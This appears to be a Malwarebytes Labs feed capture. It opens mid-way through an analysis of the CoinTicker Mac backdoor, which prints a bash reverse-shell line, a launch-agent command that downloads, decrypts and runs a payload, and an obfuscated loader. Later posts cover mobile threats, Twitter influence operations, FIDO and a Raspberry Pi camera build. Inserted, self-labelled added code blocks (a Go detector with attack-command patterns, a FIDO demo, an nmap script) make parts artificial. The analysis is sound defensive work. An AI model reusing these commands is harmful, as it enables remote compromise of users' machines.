Finally, it creates and runs a shell script at /tmp/, which also establishes a reverse shell.

#! /bin/bash
nohup bash &> /dev/tcp/ 0>&1

The CoinTicker app also creates a user launch agent, named .espl.plist, that runs the same command periodically:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">
<dict>
    <key>AbandonProcessGroup</key>
    <true/>
    <key>Label</key>
    <string></string>
    <key>ProgramArguments</key>
    <array>
        <string>sh</string>
        <string>-c</string>
        <string>nohup curl -k -L -o /tmp/.info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/ -k 111111qq; python /tmp/</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>StartInterval</key>
    <integer>90</integer>
</dict>
</plist>

If it seems like this results in the espl binary being launched multiple times, that is indeed the case.
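As an added defender's example (not Malwarebytes code), the Go program below reads a LaunchAgent plist and scores it against the traits of the .espl.plist persistence described above: a hidden filename, a short StartInterval, and a sh -c one-liner that curls into /tmp, decrypts with openssl, runs python from /tmp, or opens a bash /dev/tcp shell. The embedded sample plist is constructed; its label, URL and script name are placeholders, not values from the real malware.

```go
package main

import (
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"regexp"
	"strconv"
	"strings"
)

// Traits seen in the CoinTicker launch agent and helper scripts: pattern, description.
var traits = [][2]string{
	{`\bcurl\b.*-o\s+/(private/)?tmp/`, "curl download into /tmp"},
	{`\bopenssl\s+enc\b.*\s-d\b`, "openssl decrypt of a staged file"},
	{`\bpython[23]?\s+/(private/)?tmp/`, "python run from /tmp"},
	{`/dev/tcp/`, "bash /dev/tcp reverse shell"},
	{`\bnohup\b`, "nohup detaching the command"},
}

type Report struct {
	Hidden     bool     // filename starts with ".", as .espl.plist did
	Interval   int      // StartInterval in seconds, 0 if absent
	Command    string   // ProgramArguments joined with spaces
	Hits       []string // trait descriptions that matched
	Suspicious bool
}

// launchAgentFields walks the plist XML tokens, remembering the last <key>, and returns ProgramArguments and StartInterval.
func launchAgentFields(plistXML []byte) (args []string, interval int, err error) {
	dec := xml.NewDecoder(bytes.NewReader(plistXML))
	lastKey, elem, inArgs := "", "", false
	for {
		tok, terr := dec.Token()
		if terr == io.EOF {
			return args, interval, nil
		}
		if terr != nil {
			return nil, 0, terr
		}
		switch t := tok.(type) {
		case xml.StartElement:
			elem = t.Name.Local
			inArgs = inArgs || (elem == "array" && lastKey == "ProgramArguments")
		case xml.EndElement:
			if t.Name.Local == "array" {
				inArgs = false
			}
			elem = ""
		case xml.CharData:
			text := strings.TrimSpace(string(t))
			switch {
			case elem == "key":
				lastKey = text
			case elem == "string" && inArgs:
				args = append(args, text)
			case elem == "integer" && lastKey == "StartInterval":
				interval, _ = strconv.Atoi(text)
			}
		}
	}
}

// AnalyzeLaunchAgent flags an agent on two matching traits, or one trait plus a hidden filename or an interval under five minutes.
func AnalyzeLaunchAgent(filename string, plistXML []byte) (Report, error) {
	args, interval, err := launchAgentFields(plistXML)
	if err != nil {
		return Report{}, err
	}
	r := Report{Hidden: strings.HasPrefix(filename, "."), Interval: interval, Command: strings.Join(args, " ")}
	for _, t := range traits {
		if regexp.MustCompile(t[0]).MatchString(r.Command) {
			r.Hits = append(r.Hits, t[1])
		}
	}
	shortInterval := interval > 0 && interval < 300
	r.Suspicious = len(r.Hits) >= 2 || (len(r.Hits) == 1 && (r.Hidden || shortInterval))
	return r, nil
}

// Constructed sample modelled on .espl.plist; the label, URL and script name
// are placeholders, not values taken from the real malware.
const sampleAgent = `<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.placeholder</string>
  <key>ProgramArguments</key><array>
    <string>sh</string><string>-c</string>
    <string>nohup curl -k -L -o /tmp/.info.enc https://PLACEHOLDER.invalid/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>90</integer>
</dict></plist>`

func main() {
	r, err := AnalyzeLaunchAgent(".espl.plist", []byte(sampleAgent))
	fmt.Printf("err=%v suspicious=%v hidden=%v interval=%d hits=%v\n", err, r.Suspicious, r.Hidden, r.Interval, r.Hits)
}
```

Run it over every file in ~/Library/LaunchAgents to triage a suspect Mac; the thresholds are a starting point, not a verdict.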

The software also creates a folder within the user’s Containers folder named .UpQZdhkKfCdSYxg, which is home to a Python script named plQqVfeJvGo. (We believe these names are randomized, but unfortunately the CoinTicker app has stopped functioning, so we have been unable to confirm.) This script is encoded to hide the content:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import getpass
import uuid

def get_uid():
    return "".join(x.encode("hex") for x in (getpass.getuser() + "-" + str(uuid.getnode())))

exec("".join(os.popen("echo 'U2FsdGVkX19GsbCj4lq2hzo27vqseHTtKbNTx9 ... TjO1GlH1+7cP7pDYa8ykBquk4WhU0/UqE' | openssl aes-256-cbc -A -d -a -k %s -md md5" % get_uid()).readlines()))

Extracting the script reveals that it is the script from the EvilOSX backdoor made by Github user Marten4n6.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Minimal bot which loads modules as they are needed from the server."""
__author__ = "Marten4n6"
__license__ = "GPLv3"
__version__ = "4.1.1"
...

This script has been customized to cause the backdoor to communicate with a server at on port 1339. The malware also creates a user launch agent named designed to keep this script running.


Although it’s unknown exactly what goal the hacker behind this malware had in mind, both EggShell and EvilOSX are broad-spectrum backdoors that can be used for a variety of purposes. Since the malware is distributed through a cryptocurrency app, however, it seems likely that the malware is meant to gain access to users’ cryptocurrency wallets for the purpose of stealing coins.

At first, this looked like it could have been a supply chain attack, in which a legitimate app’s website is hacked to distribute a malicious version of the app. Such attacks have happened multiple times in the past, such as when the Transmission site was hacked (twice) to distribute KeRanger and Keydnap, or when a Handbrake mirror server was hacked to distribute Proton.

However, on further inspection, it looks like this app was probably never legitimate to begin with. First, the app is distributed via a domain named This is close to, but not quite the same as, the name of the app. Getting the domain name wrong seems awfully sloppy if this were a legitimate app. Adding further suspicion, it seems that this domain was just registered a few months ago on July 13.

For this reason, Malwarebytes for Mac detects the CoinTicker application in addition to the other components of this malware, as OSX.EvilEgg.

One interesting note about this malware is that none of it requires anything other than normal user permissions. Root permissions are not needed. There is often an erroneous over-emphasis on malware’s need for root privileges, but this malware is a perfect demonstration that malware does not need such privileges to have high potential for danger.

Indicators of Compromise

Files created:

/private/tmp/.info.enc
/private/tmp/
/private/tmp/
/private/tmp/espl
~/Library/LaunchAgents/.espl.plist
~/Library/LaunchAgents/[random string].plist
~/Library/Containers/.[random string]/[random string]

Network connections:

SHA-256:
f4f45e16dd276b948dedd8a5f8d55c9e1e60884b9fe00143cb092eed693cddc4
espl: efb5b32f87bfd6089912073cb33850c58640d59cb52d8c63853d97b4771bc490

The post Mac cryptocurrency ticker app installs backdoors appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (October 22 – 28)

Malwarebytes - Mon, 10/29/2018 - 17:00

Last week on Malwarebytes Labs, we took a look at some new Mac malware, gave you a roundup of 2018 exploit kits, and dispensed some advice on sextortion scams. We also looked at the Cathay Pacific breach, groaned at the revival of an old browser trick, and explained how voting machines and elections are vulnerable to attack.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (October 22 – 28) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: top five scariest mobile threats

Malwarebytes - Mon, 10/29/2018 - 15:00

In the spirit of this upcoming Halloween season, we thought we’d provide you with a list of the top five scariest mobile threats in our book.

The list is organized from least to most haunting, based on my own humble opinion gathered from several years as a mobile threat researcher. Of course, my opinion has also been formed by the data we’ve collected within the last few months that shows which threats have been terrorizing customers the most. Without further ado, these are the top threats that haunt my dreams.

5) The clinking of locks and chains

Although not the most prevalent mobile malware (thank goodness), mobile ransomware’s nastiness will give you the chills. It starts by tricking users into giving away their device administrator rights. Afterwards, the ransomware offers a treat of locking the device from any use unless you pay a ransom.

Even scarier, some mobile ransomware threatens prosecution by law enforcement, claiming illegal activities have been conducted on the device. This is all a hoax, as law enforcement would never request paying a fine through payment methods like Bitcoin or gift cards. The most popular mobile ransomware family is detected by Malwarebytes as Android/Ransom.SLocker.

4) Guerrilla warfare

As a mobile researcher, it sometimes feels like a war out there. This is especially true with the mobile malware Android/Trojan.Guerrilla. Guerrilla warfare can be described as irregular, which sums up this Guerrilla’s tactic of obfuscating its code to evade malware scanners. Infections usually come with multiple variants of Guerrilla running on the device. However, for every move they make, we have a counter move. The war is never-ending.


3) Dashing from ghosts? No, to the top of detections list!

Android/Adware.MobiDash will make your skin crawl! It’s one of the most highly detected threats we’ve seen on customers’ Android devices! As if possessed, MobiDash goes above and beyond the typical low-level adware. It starts by sneaking its way into getting device administration rights. Once given, the user will be doomed with ads on their lock screen.

Good luck uninstalling, as some versions are especially good at hiding themselves in plain sight!

2) Lurking in the shadows…of code!

Another high-ranking threat found on customers’ Android devices, Android/Trojan.HiddenAds, is a smooth criminal. Also known as Android/Trojan.Hiddad, its haunting ability to effectively hide its malicious code is terrifying! In fact, it often bypasses Google Play Protect’s verification system. Thus, apps infected with HiddenAds make it onto the Play Store. After installing on a device, periodic full-screen ads will haunt you!

1) The one that keeps me up at night: Adups

Seriously, I have lost sleep over this one. Adups and I have a long history:

Mobile Menace Monday: Adups, old and new

Mobile Menace Monday: upping the ante on Adups

Adups comes in many forms, but the most prevalent is Android/PUP.Riskware.Autoins.Fota. This variant can potentially auto-install malware like Android/Trojan.Guerrilla and Android/Trojan.HiddenAds. As addressed in the blogs linked above, it is a preinstalled system app. Thus, it cannot be uninstalled through the device’s information page, only disabled. However, the nightmare gets worse—Adups can’t even be disabled. Not even a mobile scanner can remove or disable it.

So how do we deal with this Freddy Krueger of a mobile threat? Well, you’re going to have to defeat it in a different realm: the realm of ADB command line tools, a part of Google’s Android Studio. Luckily, we found a way to wake up from the nightmare, as we recently updated a guide on how to fully uninstall (not just disable) Adups. Beware, though, this tutorial is not for the faint of heart, and only recommended for advanced users.

Safe room

When the boogie men of mobile threats try to break through the walls, we have a safe room for you: Malwarebytes for Android keeps the scariest mobile threats at bay! Stay safe out there!

The post Mobile Menace Monday: top five scariest mobile threats appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Information operations on Twitter: new data released on election tampering

Malwarebytes - Thu, 10/18/2018 - 15:00

Back in April, we talked about the wealth of options available to Russian hackers and others launching social engineering campaigns, whether on social networks or through clever attacks launched via Advanced Persistent Threats. Some of that was information published by Twitter at the time in relation to election tampering/interference by so-called “Russian Troll farms”—specifically, the IRA (Internet Research Agency).

Some of the numbers involved were already impressive: 3,841 accounts were linked to the IRA and around 1.6 million notifications were sent out to people who had interacted with these accounts in some way. At the tail end of 2018, Twitter has released yet more data related to this particular campaign.

For example, there’s now an additional 770 accounts (potentially from Iran) to sit alongside the original 3,841 from Russia. That includes “10 million Tweets and 2 million images, GIFs, videos, and periscope broadcasts.” Some of the oldest accounts date back to 2009.

All of this has been put onto an “Elections Integrity” portal by Twitter for researchers to investigate further. That’s 1.24GB of Tweet information and 296GB of media data across 302 archives for the IRA, and 168MB of Tweet information and 65.7GB of media across 52 archives for what’s being referred to as “Iran.”

DFRLab are one of the organisations given access to the data ahead of time, and the story has recently broken elsewhere, so expect many updates and developments over the next few days. As Ben Nimmo puts it:

They were about the home government first
– had multiple goals
– targeted specific activist communities
– apolitical
– opportunistic
– evolved
– not always high-impact

The timeline of the Tweets is fascinating, as are the posting habits of both Russian and Iranian groups. For example, some individual accounts developed a “personality,” while others just attempted to trend fake stories. That thread is going to grow and grow, so you may wish to bookmark it for easy reference.

Meanwhile, DFRLab are going to be publishing a series of Medium blogs on their findings in more detail. The first is already live, and covers seven key takeaways from the research done so far.

Any doubts you may have had about the likelihood of large scale, long term, professional troll campaigns should have just been swept away. There is no doubt: This is indeed a “full fledged influence op,” and it raises many questions about what’s put into the social sphere, and (more importantly) what we do with it once viewed alongside a response from the platform itself.

We’ve already seen how Russian Facebook ads were used to try and divide opinion in the run up to the 2016 US elections, and it’s clear no expense was spared and no major platform was ignored in the quest to troll the public at large. Everyone needs to step up their game, from the people unwittingly republishing state-sanctioned social engineering ops to the platforms we use on a daily basis possessing the ability to do something about it.

The post Information operations on Twitter: new data released on election tampering appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Is FIDO the future instrument to prove our identity?

Malwarebytes - Wed, 10/17/2018 - 16:52

FIDO, short for Fast IDentity Online, is an industry consortium started in 2013 to address the lack of interoperability among strong authentication devices and the problems users face creating and remembering multiple usernames and passwords. Among the founders were those who work in the financial sector, device manufacturers, and providers of authentication solutions.

What is FIDO?

According to the FIDO Alliance website, FIDO is a set of open and scalable standards that enable simpler and more secure user authentication experiences across many websites and mobile services.

FIDO set out to make authentication devices easier to use and fix the conflicts between devices from different vendors. Their goal is to provide a set of specifications for the entire range of authentication techniques. These specifications should then provide a standard for the entire industry leading to better compatibility and more ease of use.

Logging in

Currently, there are a variety of options for users to log in to their services and devices. We have discussed the basics of two-factor authentication (2FA) in the past, and almost everyone agrees that it is impractical to remember 27 or more passwords and usernames for individual accounts—nor is it safe to re-use passwords through multiple accounts. So, what are our options for logging in?

The most common ones are divided up into these categories:

  • The classic username and password combination
  • Knowing a PIN or TAN code (ATM withdrawals, money transfers)
  • Having access to an email account (when verification codes are sent by mail) or mobile device (texted codes)
  • Secret questions (often frowned upon as they are sometimes easy to guess, or easy to obtain through phishing)
  • Physical keys (card readers, USB keys)
  • Biometrics (fingerprint readers, iris scanners, voice recognition)
  • Mobile devices that can scan barcodes or QR codes and calculate a login code for one time use (Authy, Google Authenticator)
  • Already being logged in to a verified account (e.g. Facebook login)

Problems and solutions

As FIDO seeks to standardize authentication protocols for the wide range of login options listed above, they must identify techniques that are problematic from a security standpoint and look for solutions.

One of the problems with many of the login options is the use of shared secrets, meaning that both the user and the software that checks the login need to know the correct answers. You might be able to keep a secret, but your software could be fooled into handing over all your information to attackers, who regularly succeed in breaching a site’s or service’s security and obtaining a multitude of login credentials.

One solution to this problem is asymmetric cryptography. The user creates two different keys, a private key and a public key, and hands the public key to the website or service when signing up. At login, as a handshake, the server sends the user a challenge based on that public key that only the holder of the private key can answer; the user responds, and the service checks the response using the public key. The answer does not give away the actual private key.

The challenge is created especially for that login attempt, so the answer can’t be used for another login with the same service or a different service. This way, the user is the only one that can answer the challenge and the only one that has access to both keys.

Advantages and disadvantages

The advantages of using asymmetric cryptography are clear:

  • It’s easy to use without having to remember a password.
  • Strong asymmetric encryption can’t be brute forced, unlike weak passwords.
  • The same key combination can be used for multiple logins (not to be confused with the challenge question, which is uniquely generated for each login attempt).
  • It’s impossible to steal from websites and services, even using Man-in-the-Middle attacks, because the private key is never sent across the Internet.

A major set-back could be if the user should ever give their private key to a third party, for example, because she lost it or because she was a victim of a phishing attack that asked directly for the private key. In such a case, having used this method across a multitude of sites and services means the user is in for a multitude of problems: each service she signed in with using this combo could be compromised.

What does FIDO have to do with this?

The FIDO Alliance hosts the open authentication standard FIDO2, which enables strong, passwordless authentication built on public key cryptography using hardware devices like security keys, mobile phones, and other built-in devices. It does this using both the W3C Web Authentication specification (WebAuthn API) and the Client to Authenticator Protocol (CTAP), a protocol used for communication between a client (the browser) or a platform (the operating system) and an external authenticator, i.e., the hardware security key.

With these capabilities, the hardware security key can replace weak, static username/password credentials with strong, hardware-backed public/private-key credentials.

Because FIDO2 is an open standard, the security device can be designed for existing hardware, such as phones or computers, and for many authentication modalities. In addition, it can be used for different communication methods, such as USB, Bluetooth, and Near Field Communication (NFC), which allows for contactless authentication to take place safely from many systems and devices.

FIDO2 can be enhanced further still for organizations requiring a higher level of security, as it supports the use of a hardware authentication device with a PIN, biometric, or gesture for additional protection.
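To make the challenge/response flow from the asymmetric-cryptography section and the FIDO2 description above concrete, here is an added Go example (not FIDO Alliance or Malwarebytes code): a relying party that mints a fresh one-time challenge per login and verifies an ECDSA P-256 assertion with the public key registered at sign-up. The authenticator is simulated in software (a real security key keeps the private key in hardware), the signed-message layout is an assumed simplification of WebAuthn's authenticatorData || SHA-256(clientDataJSON), and the origin check mirrors WebAuthn's clientData origin binding.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"time"
)

// Assertion is the authenticator's answer to one login challenge.
type Assertion struct {
	CredID    string
	Challenge []byte
	Origin    string // origin the client observed; a phishing page reports a different one
	Sig       []byte // ASN.1 ECDSA signature over signedMessage(...)
}

// signedMessage binds the relying-party ID, observed origin and one-time challenge into the bytes that get signed (simplified layout).
func signedMessage(rpID, origin string, challenge []byte) []byte {
	rpHash := sha256.Sum256([]byte(rpID))
	clientHash := sha256.Sum256(append([]byte(origin+"|"), challenge...))
	return append(rpHash[:], clientHash[:]...)
}

// Authenticator stands in for a security key; the private key never leaves it.
type Authenticator struct{ priv *ecdsa.PrivateKey }

func NewAuthenticator() *Authenticator {
	priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	return &Authenticator{priv: priv}
}

// PublicKey is what the user hands the service at sign-up.
func (a *Authenticator) PublicKey() *ecdsa.PublicKey { return &a.priv.PublicKey }

// Assert answers a challenge by signing it; the reply reveals nothing about the private key.
func (a *Authenticator) Assert(credID, rpID, origin string, challenge []byte) Assertion {
	digest := sha256.Sum256(signedMessage(rpID, origin, challenge))
	sig, err := ecdsa.SignASN1(rand.Reader, a.priv, digest[:])
	if err != nil {
		panic(err)
	}
	return Assertion{CredID: credID, Challenge: challenge, Origin: origin, Sig: sig}
}

// RelyingParty (the website) stores public keys and outstanding challenges only.
type RelyingParty struct {
	rpID, origin string
	creds        map[string]*ecdsa.PublicKey
	pending      map[string]time.Time // hex(challenge) -> expiry
}

func NewRelyingParty(rpID, origin string) *RelyingParty {
	return &RelyingParty{rpID: rpID, origin: origin, creds: map[string]*ecdsa.PublicKey{}, pending: map[string]time.Time{}}
}

func (rp *RelyingParty) Register(credID string, pub *ecdsa.PublicKey) { rp.creds[credID] = pub }

// BeginLogin mints a fresh random challenge that is valid for a single attempt.
func (rp *RelyingParty) BeginLogin() []byte {
	ch := make([]byte, 32)
	if _, err := rand.Read(ch); err != nil {
		panic(err)
	}
	rp.pending[hex.EncodeToString(ch)] = time.Now().Add(2 * time.Minute)
	return ch
}

// FinishLogin verifies the assertion and consumes the challenge, so the same
// answer cannot be replayed here or presented to a different service.
func (rp *RelyingParty) FinishLogin(a Assertion) error {
	pub, ok := rp.creds[a.CredID]
	if !ok {
		return fmt.Errorf("unknown credential %q", a.CredID)
	}
	key := hex.EncodeToString(a.Challenge)
	expiry, issued := rp.pending[key]
	delete(rp.pending, key) // single use, even when the attempt fails
	if !issued {
		return errors.New("challenge not issued or already used")
	}
	if time.Now().After(expiry) {
		return errors.New("challenge expired")
	}
	if a.Origin != rp.origin {
		return fmt.Errorf("origin mismatch: %q", a.Origin)
	}
	digest := sha256.Sum256(signedMessage(rp.rpID, a.Origin, a.Challenge))
	if !ecdsa.VerifyASN1(pub, digest[:], a.Sig) {
		return errors.New("signature does not verify under the registered public key")
	}
	return nil
}
```

A second FinishLogin with the same assertion fails because the challenge was consumed, which is why a captured answer is useless to a man-in-the-middle.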

Proving your identity in the future

While FIDO has enabled the industry to make steps toward a safer method of online authentication, it is still far from being the standard it sets out to be. The current usage of FIDO is limited to high-end applications and organizations.

And even though browsers and operating systems have started to develop built-in support for FIDO2, they are not ready for market yet. Also, a new Universal Server certification for servers that operate with all FIDO authenticator types (FIDO UAF, FIDO U2F, WebAuthn, and CTAP) is on its way. And even when those stages are complete, the websites and services that require a secure authentication method will probably need some convincing to start using this new format. And finally, only once early adopters have adopted the technology and sung its praises will more mainstream usage follow suit.


Using asymmetric keys is the most logical and secure method to prove your identity right now, but it could very well be replaced by a blockchain technology. Given the rate of development in blockchain technology, especially compared to the relatively slow advances made in FIDO, this seems a likely scenario. And it doesn’t help that competing standards are created like the PCI-DSS, instead of bundling the efforts into creating an all-encompassing standard.

The one standard to rule them all will probably be the one that has the widest applicability. Being able to log in anywhere without the hassle of passwords almost sounds too good to be true, but the answers are out there. Hopefully, with the application of the best standard, we will see a future with fewer breaches and more peace of mind.

The post Is FIDO the future instrument to prove our identity? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How to build your own motion-activated security camera

Malwarebytes - Tue, 10/16/2018 - 15:00

Attention makers! Are you looking for a challenging project that not only gets your gears grinding but helps to keep you secure while traveling? Welcome to the build-your-own security camera tutorial.

The impetus for this project originated from events that took place at Defcon 26, where hotel security staff inspected attendee rooms while not properly identifying themselves.

Gross overreach. Violation of your rights. Violation of your privacy. These are always good motivators. The whole story is well covered here.

So our goal is to build a motion-activated security camera that we can use to monitor our own hotel rooms, homes, or other locations. Let’s begin.

Choosing the hardware

While ready-made hardware that would satisfy my requirements does exist, as a quick web search demonstrated, I would need to assess the security posture of each of those products, whereas I can build satisfactory security into the device if I build it myself.

A selection of commercially available portable spy cameras.

Building such a device should be possible with open-source software and off-the-shelf components. This should be easy, right?

After a quick rummage through my spare parts bin, I found a first-generation Raspberry Pi.

Raspberry Pi classic

After some careful consideration, I elected to have the captured video and stills saved locally. This device is going to be deployed on the most hostile network ever, after all. I could hardwire it to the hotel network, or try to give it cellular connectivity, perhaps by using something like a nova global cellular modem.

I decided against it: Better to start small and limit the scope of the project. I can always add this functionality later, and using a cellular modem isn’t a guarantee that the network traffic will not be tampered with or intercepted.

After some research, I confirmed that the latest version of Raspbian (the official Raspberry Pi OS) still supports the original Raspberry Pi. Further digging yielded 16GB and 32GB SD cards. Both of these would be well suited to the task. I started by performing a fresh install of the Raspbian OS to confirm that everything was okay with this Raspberry Pi. It had been a few years and I had forgotten exactly why it had fallen into disuse.

I downloaded the latest version of Raspbian here.

Software and tools

I then extracted the 2018-06-27-raspbian-stretch.img from the raspbian-2018-06-29/ file, and used Etcher to copy it to said SD card.

Etcher is a program that facilitates writing images to SD cards.

After inserting the SD card into the RPI and connecting a keyboard and monitor to it, I played around with it for a while. Once I was satisfied that, other than being a little old, everything was working, I added some heatsinks, as it is a cheap upgrade. I foresee the device running for several days in a row.

A simple heatsink kit available for the Raspberry Pi.

I also took the opportunity to verify the exact model of Raspberry Pi I had. This was achieved with the command: cat /proc/device-tree/model

The result was: Raspberry Pi Model b rev. 2

I also dug up a cheap USB webcam I already had. The plan was to use that to recycle old hardware and avoid additional costs. (More later on why this was not a good idea for this particular project.) The webcam I had kicking around was a Logitech LZ241DV. I researched compatibility on It didn’t show much promise.

A quick Ctrl + F search for the Logitech camera’s model number on the page listing Raspberry Pi–compatible webcams turned up zero hits.

Choosing an OS

During my research for this project, it quickly became apparent that the best-suited operating system for this project isn’t in fact Raspbian, but motioneyeOS.

motionEyeOS is, according to its GitHub wiki, a Linux distribution that turns a single-board computer into a video surveillance system.

Not only is motioneyeOS specifically tailored to our task, but it has a Raspberry Pi–specific compiled version. I downloaded the appropriate versions for the hardware I have on hand.

I installed motioneyeOS on a different SD card, connected the USB camera, wired in a network cable, and plugged it into a test network I have in the lab.

To connect to the motioneyeOS Rasberry Pi, you can use a browser on any machine on the same network and simply type the IP address of the motioneyeOS Rasberry Pi into the browser. Then, you will be greeted with a web-based management interface.

Simple diagram showing the topology of the motioneyeOS Raspberry Pi in relation to the machine used to configure it via the web interface.

Once the Raspberry Pi was fully booted, I ran a quick Nmap scan of the network from a machine that also resides on the same network: nmap -sP

Example of the nmap command in bash to determine the IP address of the motioneyeOS

It is best to perform this nmap scan before and after turning the Raspberry Pi on. The new address shown by nmap will be the instance of motioneyeOS.

NB: This IP address can change between reboots!

The web-based interface for motioneyeOS, showing the USB camera garbled video

If you connect a monitor to the Raspberry Pi running motioneyeOS, it will also display its IP at the prompt. As we can see, the USB webcam doesn’t want to play video properly. I investigated on the web for a while, and tried routing the USB webcam through a powered hub. (This was one of the possible solutions I found online.) All to no avail.

At this point, to be thorough, I also downloaded the Raspberry Pi 3 image for motioneyeOS.

I flashed it onto a 32 GB micro SD card, temporarily decommissioned my retro gaming emulation project, and tested the USB webcam on a current, known-working Raspberry Pi 3. (The nice thing about this is that restoring that project will only require swapping my original micro SD card back in.)

Same results.

So the webcam isn’t going to work without some serious fiddling about. After giving this some more thought, I elected to buy the Raspberry Pi–specific camera. If I’m going to have to buy a camera of some sort, it’s best to get one made specifically for the Raspberry Pi in the first place.

I settled on the Raspberry Pi Camera Module V2, 8 megapixel, 1080p. There are low-light versions of these cameras, but I want the higher picture quality.


And this is where it gets messy. The module that came in the mail was either defective right out of the box, or I zapped it with static electricity early on.

I spent hours reinstalling Raspbian on the original Raspberry Pi, disconnecting and reconnecting the ribbon connector at both ends. I disconnected the camera module from the mini daughter board and reseated it. I reinstalled motionEyeOS, disconnecting and reconnecting the ribbon again. Then I repeated the whole process with the Raspberry Pi 3, under both Raspbian and motionEyeOS.

This confirmed that the camera module was indeed dead on arrival (DOA). Nothing I did yielded success. The best I could achieve was command line confirmation that the camera was present. The web interface of motioneyeOS always complained that the camera could not be initialized.

I decided to order a different camera module. I settled on the Keyestudio Camera Module 5MP REV 1.3 for Raspberry Pi. It is Raspberry Pi–specific, but a different brand from my first attempt.

This solved all the problems, and I was met with success on the first boot attempt of the classic Raspberry Pi running motionEyeOS.

Successful video capture!

To have access to all the features and settings of motionEyeOS, you need to log in as “admin.” Out of the box, that account has an empty password.

The username and password should be changed to something non-default before you deploy this in your hotel room; an admin interface with default credentials on a hotel network is an open invitation.

I also disabled the FTP server, the Samba server, and the SSH server. I want to reduce the attack surface of this device as much as possible. I can retrieve the desired footage either directly from the micro SD card, or by re-enabling SSH afterwards.

If DHCP is enabled and the network cable is disconnected, the machine will boot loop as it tries to obtain an IP address.

In the advanced settings, you can also enable motion notification. This is where you configure the actions to be taken should motion be detected. This is also where you would configure the aforementioned Nova cellular modem.
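The two checks above, finding the Pi’s address by diffing a host-discovery scan taken before power-on against one taken afterwards, and then confirming that only the web UI answers once FTP, Samba and SSH are disabled, can be scripted. The following is an added example and not code from the original post: the scan output in it is constructed nmap -oG (grepable) text, the 192.168.50.0/24 subnet and the Pi’s address are hypothetical, and the assumption that the motionEye web UI listens on TCP/80 is mine.

```python
"""Added example; not code from the original post. Finds the freshly booted
motionEyeOS Pi by diffing two host-discovery scans, then checks that only
the web UI is exposed after hardening. BEFORE_SCAN/AFTER_SCAN/FACTORY_SCAN/
HARDENED_SCAN are constructed nmap -oG output; the subnet, the Pi's address
and the web-UI-on-80 assumption are hypothetical."""
import subprocess

# Constructed: `nmap -sn -oG - 192.168.50.0/24` before and after power-on.
BEFORE_SCAN = """# Nmap 7.70 scan initiated (constructed)
Host: 192.168.50.1 (gateway.lan)\tStatus: Up
Host: 192.168.50.10 ()\tStatus: Up
"""
AFTER_SCAN = BEFORE_SCAN + "Host: 192.168.50.23 ()\tStatus: Up\n"

# Constructed: `nmap -p 21,22,80,139,445 -oG - 192.168.50.23` on a fresh
# install (services still on) and again after the hardening step.
FACTORY_SCAN = ("Host: 192.168.50.23 ()\tPorts: 21/open/tcp//ftp///, "
                "22/open/tcp//ssh///, 80/open/tcp//http///, "
                "139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///"
                "\tIgnored State: closed (995)")
HARDENED_SCAN = ("Host: 192.168.50.23 ()\tPorts: 80/open/tcp//http///, "
                 "445/closed/tcp//microsoft-ds///\tIgnored State: closed (998)")

ALLOWED_PORTS = {80}   # assumption: only the motionEye web UI should answer


def up_hosts(grepable):
    """Addresses nmap reported as 'Status: Up' in -oG host-discovery output."""
    return {line.split()[1] for line in grepable.splitlines()
            if line.startswith("Host:") and "Status: Up" in line}


def new_hosts(before, after):
    """Hosts present only in the second scan: the device we just powered on."""
    return sorted(up_hosts(after) - up_hosts(before))


def open_tcp_ports(grepable):
    """Map host -> sorted open TCP ports from -oG port-scan output.
    Each port entry reads port/state/protocol/owner/service/rpc/version."""
    result = {}
    for line in grepable.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t")[0]
        ports = []
        for entry in ports_field.split(","):
            f = entry.strip().split("/")
            if len(f) >= 3 and f[1] == "open" and f[2] == "tcp":
                ports.append(int(f[0]))
        result[host] = sorted(ports)
    return result


def unexpected_services(grepable, host, allowed=ALLOWED_PORTS):
    """Open ports on `host` outside the allow-list; an empty list means the
    FTP/Samba/SSH services really are off."""
    return [p for p in open_tcp_ports(grepable).get(host, []) if p not in allowed]


def scan(*args):
    """Run a real nmap (must be installed) and return its grepable output,
    e.g. scan("-sn", "192.168.50.0/24") or scan("-p", "21,22,80,139,445", ip)."""
    return subprocess.run(["nmap", "-oG", "-", *args], check=True,
                          capture_output=True, text=True).stdout


if __name__ == "__main__":
    pi = new_hosts(BEFORE_SCAN, AFTER_SCAN)
    print("new host(s):", pi)
    for label, text in (("fresh install", FACTORY_SCAN), ("hardened", HARDENED_SCAN)):
        print(label, "unexpected ports:", unexpected_services(text, pi[0]))
```

To use it against a live network, replace the constructed strings with `scan("-sn", subnet)` output taken with the Pi off and on, and with `scan("-p", "21,22,80,139,445", pi_address)` output before and after disabling the services; a non-empty result from unexpected_services() means something is still listening that you thought you had turned off.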

The final product

So there you have it. After some effort, we have a motion-activated security camera, built with off-the-shelf components and open-source software.

The finished product. (The screen is superfluous and was only used for configuration purposes.)

What lessons did we learn?

  • Don’t assume the hardware you have is working. It went in the junk pile for a reason. For example, I wasn’t able to upcycle the USB webcam.
  • Micro SD memory cards are small and easily misplaced. (I lost one during this experiment!)
  • SD cards can fail. I used the SD memory card formatter utility to confirm this.
